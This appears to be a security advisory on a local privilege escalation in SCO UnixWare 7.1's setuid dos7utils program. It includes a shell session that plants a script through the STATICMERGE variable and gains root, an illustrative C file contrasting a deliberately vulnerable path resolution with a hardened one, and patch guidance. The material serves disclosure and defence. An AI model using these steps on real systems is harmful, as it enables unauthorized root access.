COMMAND

    dos7utils

SYSTEMS AFFECTED

    SCO UnixWare 7.1

PROBLEM

    Brock Tellier found the following.  A vulnerability exists in the
    /usr/lib/merge/dos7utils program (setuid root by default)  which
    allows any local user to execute arbitrary commands as root.  The
    dos7utils  program  builds  the path of the localeset.sh script it
    executes from the environment  variable STATICMERGE, which is under
    the control of the invoking user.  By pointing STATICMERGE at a
    directory writable by us, dropping our own localeset.sh there, and
    invoking dos7utils with the -f switch, we have dos7utils run our
    script as root, as follows:

        bash-2.02$ uname -a; id; pwd
        UnixWare fear71 5 7.1.0 i386 x86at SCO UNIX_SVR5
        uid=101(xnec) gid=1(other)
        /usr/lib/merge
        bash-2.02$ export STATICMERGE=/tmp
        bash-2.02$ cat > /tmp/localeset.sh
        #!/bin/sh
        id
        bash-2.02$ chmod 700 /tmp/localeset.sh
        bash-2.02$ ./dos7utils -f bah
        uid=0(root) gid=1(other)
        groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(audit),10(nuucp),12(daemon),23(cron),25(dtadmin),47(priv),9(lp)
        bash-2.02$
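
    The root cause is a setuid binary trusting an exec path taken from
    its own environment.  The C program below is an added example, not
    SCO's code: it shows the vulnerable resolution next to a hardened
    one.  The default directory /usr/lib/merge, the helper names, and
    the -f handling are assumptions for illustration; the real
    dos7utils internals are not published in this advisory.

```c
/* suid_exec_path.c: the dos7utils pattern, vulnerable and hardened.
 * Added example, not SCO's code. DEFAULT_MERGE_DIR and all function
 * names are assumptions for illustration. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>

#define DEFAULT_MERGE_DIR "/usr/lib/merge"   /* assumed compile-time default */
#define LOCALESET_SCRIPT  "localeset.sh"

/* Vulnerable: whatever the caller put in STATICMERGE becomes the exec
 * directory, even though the process runs with effective uid 0. */
const char *resolve_dir_vulnerable(const char *staticmerge)
{
    return staticmerge ? staticmerge : DEFAULT_MERGE_DIR;
}

/* Is dir an absolute path to a root-owned directory that neither group
 * nor world can write?  ".." is rejected anywhere (deliberately strict). */
int dir_is_trusted(const char *dir)
{
    struct stat st;
    if (dir == NULL || dir[0] != '/' || strstr(dir, "..") != NULL)
        return 0;
    if (stat(dir, &st) != 0 || !S_ISDIR(st.st_mode))
        return 0;
    if (st.st_uid != 0 || (st.st_mode & (S_IWGRP | S_IWOTH)) != 0)
        return 0;
    return 1;
}

/* Hardened: a privileged process (effective uid 0, or real uid differing
 * from effective uid, i.e. running setuid) never takes an exec path from
 * the environment.  An unprivileged run may honour STATICMERGE, but only
 * when the directory passes dir_is_trusted(). */
const char *resolve_dir_hardened(const char *staticmerge, uid_t ruid, uid_t euid)
{
    if (euid == 0 || ruid != euid)
        return DEFAULT_MERGE_DIR;
    if (staticmerge != NULL && dir_is_trusted(staticmerge))
        return staticmerge;
    return DEFAULT_MERGE_DIR;
}

/* Join dir and the script name into out.  Returns 0, or -1 if the
 * result would not fit (truncated paths are not executed). */
int build_script_path(const char *dir, char *out, size_t outsz)
{
    int n = snprintf(out, outsz, "%s/%s", dir, LOCALESET_SCRIPT);
    return (n < 0 || (size_t)n >= outsz) ? -1 : 0;
}

/* Exec the script with a minimal, fixed environment so the child cannot
 * inherit PATH, IFS, LD_* or similar from the invoking user.  Only
 * reached from main(); returns -1 if execve fails. */
int exec_localeset(const char *path)
{
    char *const argv[] = { (char *)path, NULL };
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
    execve(path, argv, envp);
    return -1;
}

int main(int argc, char **argv)
{
    char path[1024];
    const char *env = getenv("STATICMERGE");
    int force = (argc > 1 && strcmp(argv[1], "-f") == 0);
    const char *dir = resolve_dir_hardened(env, getuid(), geteuid());

    if (build_script_path(dir, path, sizeof path) != 0) {
        fputs("localeset path too long\n", stderr);
        return 1;
    }
    /* Show what the advisory's attacker would have obtained vs. what the
     * hardened resolution actually executes. */
    printf("vulnerable resolution: %s/%s\n", resolve_dir_vulnerable(env), LOCALESET_SCRIPT);
    printf("hardened resolution:   %s\n", path);
    if (force) {
        exec_localeset(path);
        perror("execve");
        return 1;
    }
    return 0;
}
```

    With STATICMERGE=/tmp the vulnerable resolution yields
    /tmp/localeset.sh exactly as in the session above, while the
    hardened resolution ignores the variable whenever the process is
    privileged.  Clearing the environment passed to the child matters
    as well: a setuid program that execs a shell script with the
    caller's environment intact is exposed through PATH and IFS even
    when the script path itself is fixed.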

SOLUTION

    Download sse037.tar.Z from SCO's site; that is the patch.  Until it
    is installed, removing the setuid bit from /usr/lib/merge/dos7utils
    (chmod u-s) closes the hole, at the cost of unprivileged users
    losing whatever Merge functionality depended on it.